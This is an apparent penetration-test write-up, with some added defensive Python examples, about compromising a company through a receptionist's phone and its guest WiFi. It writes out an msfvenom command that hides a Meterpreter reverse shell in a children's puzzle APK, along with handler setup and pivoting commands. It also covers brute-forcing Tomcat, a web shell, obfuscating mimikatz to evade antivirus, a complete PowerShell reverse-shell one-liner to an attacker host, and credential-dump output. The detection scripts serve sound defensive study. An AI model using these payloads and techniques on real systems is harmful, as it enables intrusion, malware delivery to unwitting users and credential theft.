Company Smartphone Security (A) - From APK to Golden Ticket: Initial Probing, Getting Domain Admin Access from an Android Smartphone, And More ...
This article describes the potential dangers of using a personal smartphone in an enterprise network; the cases described are typical of what happens in real-life incidents. It turns out that it is not difficult to trick an employee into installing a malicious application, bypass the network protections, gain access to the corporate network, escalate privileges and obtain confidential information.
It also turns out that it is possible to get past all of the protection mechanisms (including anti-virus software) without being discovered. An attacker can do this using some of the system's native tools and publicly available scripts, without relying much on external tooling.
This is what we often call the KISS strategy (Keep It Simple, Stupid).
Any resemblance of the following story to real events or real people is pure coincidence.
Background
Super Company hired our penetration testers to conduct a social engineering assessment of its staff, aimed at finding every way confidential information could be stolen so that employees
During the kickoff meeting we asked for access to the guest WiFi. The guest WiFi is password protected: it requires login credentials, which are valid for one day only.
Once connected to the WiFi we ran a quick scan with Fing from an iPhone. We found several Android devices, apparently more than the number of corporate visitors, so we suspected that company employees also use the guest WiFi, perhaps to save their own data plans. In fact, the receptionist who gave us the login credentials was chatting on WhatsApp when we asked how to access the internet.
Scene: two phones on the desk, a tidy desktop, a photo of a family of three.
After a brief chat I learned that her daughter is four years old and very lively, but calms down as long as she has the smartphone with games installed. Ah, kids these days...
Attack description
The social engineering began with a small phishing campaign, which failed. We then found out that the company's staff had been trained shortly before our engagement and were very wary of attachments, downloads and the like. Not a good start.
So we decided to focus on the receptionist. Our aim was to get her to download an Android app for children, and what is more appealing to a child than a puzzle? Ha, we like jigsaw puzzles.
Finding the receptionist's email address was easy, and we sent her an email with a link to the download page. We also included a QR code in the mail, so that installing the app was as simple as scanning a picture.
Cute, right? Our goal was to get the malicious Android application installed: the app really is a jigsaw puzzle, but it hides a Meterpreter shell inside.
Aiming at the smartphone
Creating a malicious Android application is very simple: we downloaded a normal application and then used msfvenom to inject the payload, a Meterpreter shell (the attacker IP is redacted in the original and shown as a placeholder):
msfvenom -x puzzle.apk -p android/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=443 -o /var/www/html/puzzle.apk
We listen on port 443 because ports 443 and 80 are usually the standard ports allowed through the firewall.
We expected the app to arouse enough interest in the receptionist that she would ignore the warnings during installation.
On our host we also started a listener:
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost <attacker-ip>
lhost => <attacker-ip>
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > exploit -j -z
[*] Started reverse TCP handler on <attacker-ip>:443
To take advantage of company staff using the guest WiFi for personal purposes, we also placed an antenna near the company premises.
Using Meterpreter
At about 8:00 in the morning I received this message in msfconsole:
[*] Meterpreter session 1 opened (<attacker-ip>:443 -> XXXX:51990) at ...
Bingo! She had installed and run the malicious Android app, and we now had a Meterpreter session.
Now we needed to know whether she was connected to the company's WiFi network. The IP showed that the connection came from the cellular network: she was probably on her way to the office, and perhaps her daughter was playing the jigsaw puzzle.
The session did not last long, and after a few minutes we lost the shell, but before 9:00 we received another session:
[*] Meterpreter session 2 opened (<attacker-ip>:443 -> KKKK:61545) at ...
This IP belonged to the company, indicating that she was now connected to the company's WiFi network.
So we started some preliminary exploration. Apart from a few smartphones, we only found a DNS server on a different subnet:
meterpreter > ipconfig
...
Interface  9
============
Name         : wlan0 - wlan0
Hardware MAC : 20:6e:9c:75:94:ba
IPv4 Address : 10.118.1.13
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::226e:9cff:fe75:94ba
IPv6 Netmask : ::
...
meterpreter > shell
Process 1 created.
Channel 1 created.
getprop net.dns1
192.168.178.196
The guest WiFi network is on 10.118.1.0/24, while the DNS server is on another subnet.
To reach that subnet we added a route through the Meterpreter session:
msf exploit(handler) > route add 192.168.178.0 255.255.255.0 1
A full Nmap scan could not be run through the pivot, so we started a SOCKS proxy and did a quick ping scan with proxychains:
msf > use auxiliary/server/socks4a
msf auxiliary(socks4a) > show options
Module options (auxiliary/server/socks4a):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  1080             yes       The port to listen on.
# On the attacker machine, scan the DNS server's network through the proxy
proxychains nmap -sn 192.168.178.0/24
Nmap scan report for 192.168.178.195
Host is up (0.15s latency).
Nmap scan report for 192.168.178.196
Host is up (0.22s latency).
Two hosts responded to the ping scan.
We then ran a quick TCP scan:
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 192.168.178.195,196
msf auxiliary(tcp) > set RPORTS 1-1024
msf auxiliary(tcp) > run
[*] 192.168.178.195: - 192.168.178.195:80 - TCP OPEN
[*] 192.168.178.195: - 192.168.178.195:8080 - TCP OPEN
[*] 192.168.178.196: - 192.168.178.196:53 - TCP OPEN
This was our conjecture of the network layout at that point:
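The root cause of everything that follows is that the guest segment (10.118.1.0/24) could reach an internal subnet (192.168.178.0/24) at all. The following is an added example, not tooling from the original engagement: a small audit of a constructed firewall rule set that reports every allow rule letting guest clients reach private (RFC 1918) address space that is not on an explicit allow-list, plus a first-match lookup to answer questions such as "can a guest client reach 192.168.178.195:8080?". The rule names, the rule set, the allow-list and the implicit default-deny are all assumptions.

```python
"""Audit guest-WiFi firewall rules for reachability into private address space.
Added example, not the article's tooling; the rule set is constructed."""
import ipaddress

PRIVATE_NETS = [ipaddress.ip_network(n)
                for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed rule set; first match wins, as on most firewalls.
RULES = [
    {"name": "guest-dns",      "src": "10.118.1.0/24", "dst": "192.168.178.196/32",
     "proto": "udp", "ports": {53},       "action": "allow"},
    {"name": "guest-internal", "src": "10.118.1.0/24", "dst": "192.168.178.0/24",
     "proto": "tcp", "ports": "any",      "action": "allow"},   # the overly broad rule
    {"name": "guest-web",      "src": "10.118.1.0/24", "dst": "0.0.0.0/0",
     "proto": "tcp", "ports": {80, 443},  "action": "allow"},   # "any" dst includes RFC 1918
    {"name": "guest-deny",     "src": "10.118.1.0/24", "dst": "0.0.0.0/0",
     "proto": "any", "ports": "any",      "action": "deny"},
]

# Internal services the guest segment is explicitly permitted to use (assumed policy).
ALLOWED_INTERNAL = {("192.168.178.196/32", "udp", 53)}


def private_overlap(dst_cidr):
    """Return the RFC 1918 ranges that a destination CIDR overlaps."""
    net = ipaddress.ip_network(dst_cidr)
    return [str(p) for p in PRIVATE_NETS if net.overlaps(p)]


def audit_guest_rules(rules, guest_cidr):
    """List allow rules that let the guest segment reach private space
    beyond the explicit allow-list."""
    guest = ipaddress.ip_network(guest_cidr)
    findings = []
    for rule in rules:
        if rule["action"] != "allow":
            continue
        if not ipaddress.ip_network(rule["src"]).overlaps(guest):
            continue
        hit = private_overlap(rule["dst"])
        if not hit:
            continue
        ports = rule["ports"]
        if ports != "any" and all((rule["dst"], rule["proto"], p) in ALLOWED_INTERNAL
                                  for p in ports):
            continue  # every port of this rule is an explicitly permitted service
        findings.append({"rule": rule["name"], "dst": rule["dst"], "reaches": hit,
                         "ports": "any" if ports == "any" else sorted(ports)})
    return findings


def first_match(rules, src_ip, dst_ip, proto, port):
    """Simulate first-match evaluation; returns (rule name, action)."""
    s, d = ipaddress.ip_address(src_ip), ipaddress.ip_address(dst_ip)
    for rule in rules:
        if s not in ipaddress.ip_network(rule["src"]):
            continue
        if d not in ipaddress.ip_network(rule["dst"]):
            continue
        if rule["proto"] not in ("any", proto):
            continue
        if rule["ports"] != "any" and port not in rule["ports"]:
            continue
        return rule["name"], rule["action"]
    return None, "deny"  # implicit default deny (assumption)


if __name__ == "__main__":
    for f in audit_guest_rules(RULES, "10.118.1.0/24"):
        print(f"{f['rule']}: guest -> {f['dst']} ports {f['ports']} reaches {f['reaches']}")
    print(first_match(RULES, "10.118.1.13", "192.168.178.195", "tcp", 8080))
```

The audit flags both the explicit internal allow and the "any destination" web rule, because 0.0.0.0/0 silently includes every private range unless a deny for private space is placed above it.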
Aim at the intranet server
Host 192.168.178.195 had ports 80 and 8080 open, so we forwarded both to our local machine in order to analyze the traffic locally:
meterpreter > portfwd add -L 127.0.0.1 -l 8001 -r 192.168.178.195 -p 80
meterpreter > portfwd add -L 127.0.0.1 -l 8002 -r 192.168.178.195 -p 8080
Port 80 exposed the company's phone book; we still do not know why they exposed that information on the guest network.
A quick scan found no obvious vulnerabilities, so we decided to check port 8080 next.
There we ran into Apache Tomcat's basic authentication. We brute-forced it with Hydra, and a few minutes later we logged in with admin / password123456.
We were now in the Tomcat manager console. This was presumably a firewall misconfiguration, since neither the Tomcat manager console nor the company directory should have been exposed on the guest network.
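A brute-force login against the manager console leaves a very recognisable trace in the Tomcat access log: a burst of 401 responses from one client, then a 200. The following is an added example, not part of the original article or of Tomcat, showing how that pattern can be picked out of common-log-format lines with a sliding window. The log lines are constructed; the path prefix, the threshold and the window size are assumptions to be tuned per site.

```python
"""Detect HTTP basic-auth brute forcing against the Tomcat manager from
access-log lines (common log format). Added example; the log is constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: one client hammering /manager/html with bad
# credentials and then succeeding, plus two clients behaving normally.
SAMPLE_LOG = """\
10.118.1.13 - - [17/Feb/2017:08:41:02 +0100] "GET /manager/html HTTP/1.1" 401 2473
10.118.1.13 - admin [17/Feb/2017:08:41:03 +0100] "GET /manager/html HTTP/1.1" 401 2473
10.118.1.13 - admin [17/Feb/2017:08:41:03 +0100] "GET /manager/html HTTP/1.1" 401 2473
10.118.1.13 - admin [17/Feb/2017:08:41:04 +0100] "GET /manager/html HTTP/1.1" 401 2473
10.118.1.13 - admin [17/Feb/2017:08:41:04 +0100] "GET /manager/html HTTP/1.1" 401 2473
10.118.1.13 - admin [17/Feb/2017:08:41:05 +0100] "GET /manager/html HTTP/1.1" 401 2473
10.118.1.13 - admin [17/Feb/2017:08:41:06 +0100] "GET /manager/html HTTP/1.1" 200 18934
192.168.178.20 - - [17/Feb/2017:08:42:10 +0100] "GET /phonebook/ HTTP/1.1" 200 5120
192.168.178.21 - - [17/Feb/2017:08:43:00 +0100] "GET /manager/html HTTP/1.1" 401 2473
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one common-log-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect_bruteforce(log_text, path_prefix="/manager/", threshold=5,
                      window=timedelta(seconds=60)):
    """Return {ip: {"failures": n, "succeeded": bool}} for every client that
    produced at least `threshold` 401s under `path_prefix` within any
    `window`-long interval. `succeeded` means a 200 on the same prefix followed
    the first failure, i.e. the guessing most likely worked."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["path"].startswith(path_prefix):
            events[rec["ip"]].append((rec["ts"], rec["status"]))

    findings = {}
    for ip, evs in events.items():
        evs.sort()
        fails = [ts for ts, st in evs if st == 401]
        burst = 0
        # Sliding window: for each failure, count failures in [ts, ts + window].
        for i, start in enumerate(fails):
            j = i
            while j < len(fails) and fails[j] - start <= window:
                j += 1
            burst = max(burst, j - i)
        if burst >= threshold:
            succeeded = any(st == 200 and ts >= fails[0] for ts, st in evs)
            findings[ip] = {"failures": len(fails), "succeeded": succeeded}
    return findings


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {info['failures']} failed manager logins, "
              f"login succeeded={info['succeeded']}")
```

The `succeeded` flag is the part worth alerting on with high priority: a burst of failures followed by a 200 on the manager path is the signature of a guessed password rather than of a forgetful administrator.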
We planned to upload a shell to Tomcat so that we could interact with the underlying operating system. The server fingerprint showed that we were dealing with a Windows server.
We built a WAR archive with the Laudanum Injectable Web Exploit Code and uploaded it through the manager page. It contained:
cmd.jsp: used to interact with cmd.exe
m.ps1: an obfuscated, AV-evading version of mimikatz.ps1 for grabbing passwords and hashes
Thanks to PowerShell's flexibility, it is easy to obfuscate PowerShell scripts with several well-known obfuscation techniques. We only changed a few keywords, such as renaming Invoke-Mimikatz to Invoke-mymy, and applied a few other tricks.
We also appended Invoke-mymy -dumpcreds to the end of the file so that the function runs as soon as the script is executed.
After uploading, we opened cmd.jsp in the browser.
Ha! The web shell ran with SYSTEM privileges. We continued to gather information, starting with the environment variables:
cmd /c set
The result (excerpt):
ALLUSERSPROFILE=C:\ProgramData
COMPUTERNAME=SRVINTRANET
USERDOMAIN=SUPERCOMPANY
USERNAME=SRVINTRANET$
Now we had the computer name, SRVINTRANET, and knew that it belonged to the SUPERCOMPANY domain. Perfect.
We continued with systeminfo to retrieve other useful information:
Command: systeminfo
Result:
Host Name: SRVINTRANET
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
...
Next, the domain controllers:
Command: cmd /c nltest /dclist:supercompany
Result:
Get a list of DCs in domain 'supercompany' from '\\SRVDC1'.
srvdc1.supercompany.local [PDC] [DS] Site: Default-First-Site-Name
srvdc2.supercompany.local [DS] Site: Default-First-Site-Name
The command completed successfully
By this time the Android device may have started to heat up, and we needed to move to a more suitable shell. The phone was no longer suitable for our work.
Our golden rule is: stay hidden and avoid anti-virus software. So we used a PowerShell-based shell, hoping that SRVINTRANET could reach the Internet.
Through the Tomcat web shell we launched a PowerShell back door that connects back to our public server, where netcat was listening on port 80 (the attacker IP is redacted in the original; the one-liner is shown here with its statements in the order in which they run):
cmd /c powershell -nop -c "$c = New-Object Net.Sockets.TCPClient('<attacker-ip>', 80); $s = $c.GetStream(); [byte[]]$b = 0..65535 | %{0}; while (($i = $s.Read($b, 0, $b.Length)) -ne 0) { $d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b, 0, $i); $sb = (IEX $d 2>&1 | Out-String); $sb2 = $sb + 'PS ' + (pwd).Path + '> '; $sb = ([text.encoding]::ASCII).GetBytes($sb2); $s.Write($sb, 0, $sb.Length); $s.Flush() }; $c.Close()"
What does this script do? When PowerShell starts it creates a TCPClient object, connects back to our machine, opens an I/O stream and uses Invoke-Expression to execute whatever it reads from that stream, writing the output back.
We were not so lucky this time: no reverse shell arrived. The server probably could not connect to the Internet, so we went back to the Tomcat web shell and ran the obfuscated mimikatz:
cmd /c powershell -executionpolicy bypass -f c:\tomcat\webapps\cmd\warfiles\m.ps1
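Both PowerShell invocations above share traits that a defender can score from process-creation telemetry: a web server process spawning a shell, a non-profile command-line invocation, a raw `Net.Sockets.TCPClient`, `Invoke-Expression` on received text, and `-executionpolicy bypass`. The following is an added example, not part of the original article: a small scorer over constructed process-creation records (fields modelled on Sysmon Event ID 1). The indicator list, the weights, the web-server parent names and the alert threshold are assumptions; the reverse-shell command line in the sample is deliberately truncated and uses a documentation IP.

```python
"""Score process-creation events for suspicious PowerShell launches.
Added example; events, indicators and weights are constructed assumptions."""
import re

# Constructed process-creation records (Sysmon Event ID 1 style fields).
EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\tomcat\bin\tomcat8.exe",
     "CommandLine": 'cmd /c powershell -nop -c "$c = New-Object Net.Sockets.TCPClient'
                    '(\'203.0.113.10\', 80); $s = $c.GetStream(); ... IEX $d ..."'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -File C:\Scripts\backup.ps1"},          # benign admin use
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\tomcat\bin\tomcat8.exe",
     "CommandLine": r"powershell -executionpolicy bypass -f c:\tomcat\webapps\cmd\warfiles\m.ps1"},
]

# (regex, weight, label); weights are assumptions, not a vendor scheme.
INDICATORS = [
    (r"Net\.Sockets\.TCPClient",             3, "raw TCP client from PowerShell"),
    (r"\b(IEX|Invoke-Expression)\b",         3, "Invoke-Expression on received text"),
    (r"-nop\b|-NoProfile\b",                 1, "no profile"),
    (r"-executionpolicy\s+bypass|-ep\s+bypass", 2, "execution policy bypass"),
    (r"GetStream\(\)",                       1, "network stream"),
]
WEB_SERVER_PARENTS = ("tomcat", "w3wp.exe", "httpd.exe", "java.exe")
PARENT_WEIGHT = 3
ALERT_THRESHOLD = 4


def score_event(ev):
    """Return (score, reasons) for one event; 0 if PowerShell is not involved."""
    cmd = ev.get("CommandLine", "")
    image = ev.get("Image", "")
    if "powershell" not in (cmd + image).lower():
        return 0, []
    score, reasons = 0, []
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, cmd, re.IGNORECASE):
            score += weight
            reasons.append(label)
    parent = ev.get("ParentImage", "").lower()
    if any(p in parent for p in WEB_SERVER_PARENTS):
        score += PARENT_WEIGHT
        reasons.append("spawned by web server process")
    return score, reasons


def detect_suspicious_powershell(events, threshold=ALERT_THRESHOLD):
    """Return the events whose score reaches the threshold, with score and reasons."""
    flagged = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            flagged.append({"score": score, "reasons": reasons,
                            "command": ev.get("CommandLine", "")})
    return flagged


if __name__ == "__main__":
    for hit in detect_suspicious_powershell(EVENTS):
        print(f"score={hit['score']} reasons={hit['reasons']}\n  {hit['command']}")
```

Note that the mimikatz launch scores on the parent-process relationship and the policy bypass alone; the web-server-spawns-shell relationship is the indicator that would have caught this intrusion even if every keyword in the script had been renamed.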
  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 191734 (00000000:0002ecf6)
Session           : Interactive from 1
User Name         : Administrator
Domain            : SRVINTRANET
Logon Server      : SRVINTRANET
Logon Time        : 2/17/2017 2:12:31 PM
SID               : S-1-5-21-938204560-2839928776-2225904511-500
        msv :
         [00010000] CredentialKeys
         * NTLM     : 604603ab105adc8XXXXXXXXXXXXXXXXX
         * SHA1     : 7754ff505598bf3XXXXXXXXXXXXXXXXXXXXXXXXX
         [00000003] Primary
         * Username : Administrator
         * Domain   : SRVINTRANET
         * NTLM     : 604603ab105adc8XXXXXXXXXXXXXXXXX
         * SHA1     : 7754ff505598bf3XXXXXXXXXXXXXXXXXXXXXXXXX
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : SRVINTRANET
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : SRVINTRANET
         * Password : (null)
        ssp : KO
        credman :
mimikatz(powershell) # exit
Bye!
We got the local administrator's password hashes, but no plaintext. That is because the target server runs Windows Server 2012, and things changed after 2008: WDigest no longer keeps plaintext passwords in memory (we can't help missing the good old days), and credman was empty. Still, this is not a bad finding.
We decided to look for a server with Internet access, since we were still working through an unstable Android phone.
With the net view command we obtained the list of servers with available shares:
Server Name            Remark
-----------------------------------------
\\SRVDC1               Domain controller PDC
\\SRVDC2               Domain Controller
\\SRVWSUS              Server WSUS
\\SRVAV                Server AV
\\SRVFILE1             File Server
This is the real server network.